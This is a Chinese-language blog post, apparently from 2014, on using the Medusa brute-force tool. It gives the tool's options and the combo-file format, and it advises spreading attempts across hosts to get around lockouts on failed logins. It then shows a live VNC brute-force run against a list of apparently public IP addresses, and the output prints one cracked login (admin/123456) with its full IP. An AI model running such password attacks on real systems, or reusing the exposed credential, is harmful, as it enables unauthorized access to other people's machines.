文档章节

暴力破解工具 medusa (马杜莎)

sincoder
 sincoder
发布于 2014/11/21 17:07
字数 1046
阅读 3390
收藏 18

官网

http://foofus.net/goons/jmk/medusa/

和知名的暴力破解工具 hydra 很像的另一个工具 

Medusa v2.1.1 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>


medusa: option requires an argument -- 'h'

CRITICAL: Unknown error processing command-line options.

ALERT: Host information must be supplied.


Syntax: Medusa [-h host|-H file] [-u username|-U file] [-p password|-P file] [-C file] -M module [OPT]

  -h [TEXT]    : Target hostname or IP address

  -H [FILE]    : File containing target hostnames or IP addresses

  -u [TEXT]    : Username to test

  -U [FILE]    : File containing usernames to test

  -p [TEXT]    : Password to test

  -P [FILE]    : File containing passwords to test

  -C [FILE]    : File containing combo entries. See README for more information.

  -O [FILE]    : File to append log information to

  -e [n/s/ns]  : Additional password checks ([n] No Password, [s] Password = Username)

  -M [TEXT]    : Name of the module to execute (without the .mod extension)

  -m [TEXT]    : Parameter to pass to the module. This can be passed multiple times with a

                 different parameter each time and they will all be sent to the module (i.e.

                 -m Param1 -m Param2, etc.)

  -d           : Dump all known modules

  -n [NUM]     : Use for non-default TCP port number

  -s           : Enable SSL

  -g [NUM]     : Give up after trying to connect for NUM seconds (default 3)

  -r [NUM]     : Sleep NUM seconds between retry attempts (default 3)

  -R [NUM]     : Attempt NUM retries before giving up. The total number of attempts will be NUM + 1.

  -c [NUM]     : Time to wait in usec to verify socket is available (default 500 usec).

  -t [NUM]     : Total number of logins to be tested concurrently

  -T [NUM]     : Total number of hosts to be tested concurrently

  -L           : Parallelize logins using one username per thread. The default is to process 

                 the entire username before proceeding.

  -f           : Stop scanning host after first valid username/password found.

  -F           : Stop audit after first valid username/password found on any host.

  -b           : Suppress startup banner

  -q           : Display module's usage information

  -v [NUM]     : Verbose level [0 - 6 (more)]

  -w [NUM]     : Error debug level [0 - 10 (more)]

  -V           : Display version

  -Z [TEXT]    : Resume scan based on map of previous scan

常用的参数

medusa -M vnc -n 5901 -R 0 -C xaa -f -T 10 -O good.txt

-M 选择破解模块

-n 自己定义服务的端口

-R 设置尝试多少次连接后 退出

-C 设置COMBO文件路径,也就是从文件做按行读取主机 用户名 和端口

可用的行格式如下:

  • host:username:password

  • host:username:

  • host::

  • :username:password

  • :username:

  • ::password

  • host::password

建议使用 combo 文件来进行爆破的功能,应该这样可以设置哪个主机先爆破,可控性较强,适用于一些限制失败次数的服务,可以设置先遍历主机 再遍历用户密码,这样可以把一段时间内对同一主机的探测次数减到最少

-f 一个主机检测到一个正确的密码后就停止

-T 设置并发主机数

-O 设置结果保存的文件,程序会将正确的结果保存到这个文件中

一次检测的主机数量不能太多,如果太多可以使用 split -l 拆分combo 文件 

root@kali :~/tmp# medusa -M vnc -n 5901 -R 0 -C xaa -f -T 10 -O good.txt

Medusa v2.1.1 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>


NOTICE: vnc.mod: failed to connect, port 5901 was not open on 101.226.179.128

NOTICE: vnc.mod: failed to connect, port 5901 was not open on 101.227.72.77

NOTICE: vnc.mod: failed to connect, port 5901 was not open on 101.226.179.135

NOTICE: vnc.mod: failed to connect, port 5901 was not open on 101.227.71.239

NOTICE: vnc.mod: failed to connect, port 5901 was not open on 101.227.72.148

NOTICE: vnc.mod: failed to connect, port 5901 was not open on 101.227.72.31

NOTICE: vnc.mod: failed to connect, port 5901 was not open on 101.227.72.36

NOTICE: vnc.mod: failed to connect, port 5901 was not open on 101.227.74.156

NOTICE: vnc.mod: failed to connect, port 5901 was not open on 101.227.74.68

NOTICE: vnc.mod: failed to connect, port 5901 was not open on 101.227.75.213

NOTICE: vnc.mod: failed to connect, port 5901 was not open on 101.227.75.242

NOTICE: vnc.mod: failed to connect, port 5901 was not open on 101.251.112.109

NOTICE: vnc.mod: failed to connect, port 5901 was not open on 101.251.122.129

NOTICE: vnc.mod: failed to connect, port 5901 was not open on 101.251.65.192

ACCOUNT CHECK: [vnc] Host: 218.93.54.xxx (19 of 100, 14 complete) User: admin (1 of 1, 0 complete) Password: 123456 (1 of 1 complete)

ACCOUNT FOUND: [vnc] Host: 218.93.54.150 User: admin Password: 123456 [SUCCESS]

NOTICE: vnc.mod: failed to connect, port 5901 was not open on 101.251.100.242

NOTICE: vnc.mod: failed to connect, port 5901 was not open on 101.251.120.212

NOTICE: vnc.mod: failed to connect, port 5901 was not open on 101.251.121.155

NOTICE: vnc.mod: failed to connect, port 5901 was not open on 101.251.122.148

NOTICE: vnc.mod: failed to connect, port 5901 was not open on 101.64.234.132

NOTICE: vnc.mod: failed to connect, port 5901 was not open on 101.64.236.48

NOTICE: vnc.mod: failed to connect, port 5901 was not open on 101.4.234.30

NOTICE: vnc.mod: failed to connect, port 5901 was not open on 101.64.234.254

NOTICE: vnc.mod: failed to connect, port 5901 was not open on 101.66.255.103

NOTICE: vnc.mod: failed to connect, port 5901 was not open on 101.69.161.253

NOTICE: vnc.mod: failed to connect, port 5901 was not open on 101.69.169.218

root@kali :~/tmp# cat good.txt 

# Medusa v.2.1.1 (2014-11-21 15:51:18)

# medusa -M vnc -n 5901 -R 0 -C xaa -f -T 10 -O good.txt 

ACCOUNT FOUND: [vnc] Host: 218.93.54.xxx User: admin Password: 123456 [SUCCESS]

# Medusa has finished (2014-11-21 15:52:18).


© 著作权归作者所有

共有 人打赏支持
sincoder

sincoder

粉丝 37
博文 402
码字总数 126660
作品 1
深圳
安天365安全研究之SSH安全研究专题20171124更新

1.Windows下安装及配置ssh server(已认领)2.linux下安装及配置ssh server(秋风已认领)3.Windows及Linux配置使用ssh客户端工具(已认领)(1)BvSshClient(2)putty(3)other4.ssh基本命...

simeon2005
2017/12/13
0
0
LaserCrack:一款可扩展的暴力破解框架

  0×01 简单说明   lasercrack是一款爆力破解工具,现如今市面上常见的暴力工具如hydra,medusa都有着不错的破解效率,不过我还没有找到ruby写的,一方面是想从原理上理解下暴力破解漏洞...

FreeBuf
07/07
0
0
批量扫内网弱口令

公司弱口令一直没有杜绝掉,很多时候都需要安全部门定期扫描,发现弱口令,责令运维去修改弱口令 今天推荐一款比较不错的工具 hydra 和medusa 这两款都是kali 和bt 自带的 hydra 很奇怪,功能...

屋脊之上
2014/07/23
0
0
medusa 2.0的简单使用

需求:公司需要对主机进行弱口令整改,所有主机已经修改了密码,但是以防有主机没有被修改,需要测试主机的密码是多少。 因为常用的密码就是1 2 3 所以就想用1 2 3去测试所有的主机,看看那些...

zfno11
06/26
0
0
蛮力攻击工具--RSYaba

RSYaba是一款类似于Hydra和Medusa的、针对多种服务的蛮力攻击工具。开发这个工具是由于作者使用现有的一些工具获得了不好的用户体验(确切是说是以HTTP和SSH方式工作),所以,才决定开发一个...

匿名
2010/10/24
975
0

没有更多内容

加载失败,请刷新页面

加载更多

Kali Linux Docker 練習

docker pull kalilinux/kali-linux-docker docker run -t -i kalilinux/kali-linux-docker /bin/bash apt-get update apt-get install htop apt-get install nmap apt-get install wpscan ap......

BaiyuanLab
今天
1
0
通俗大白话来理解TCP协议的三次握手和四次分手

最近在恶补计算机网络方面的知识,之前对于TCP的三次握手和四次分手也是模模糊糊,对于其中的细节更是浑然不知,最近看了很多这方面的知识,也在系统的学习计算机网络,加深自己的CS功底,就...

onedotdot
今天
2
0
TiDB 在爱奇艺的应用及实践

爱奇艺,中国高品质视频娱乐服务提供者,2010 年 4 月 22 日正式上线,推崇品质、青春、时尚的品牌内涵如今已深入人心,网罗了全球广大的年轻用户群体,积极推动产品、技术、内容、营销等全方...

TiDB
今天
1
0
Web系统大规模并发:电商秒杀与抢购

一、大规模并发带来的挑战 在过去的工作中,我曾经面对过5w每秒的高并发秒杀功能,在这个过程中,整个Web系统遇到了很多的问题和挑战。如果Web系统不做针对性的优化,会轻而易举地陷入到异常...

xtof
今天
3
0
代码质量管理平台-sonarqube

在工作中,往往开发的时候会不怎么注重代码质量的人很多,存在着很多的漏洞和隐患等问题,sonarqube可以进行代码质量的审核,而且十分的残酷。。。。。接下来我们说下怎么安装 进入官网下载:...

落叶清风
今天
9
0

没有更多内容

加载失败,请刷新页面

加载更多

返回顶部
顶部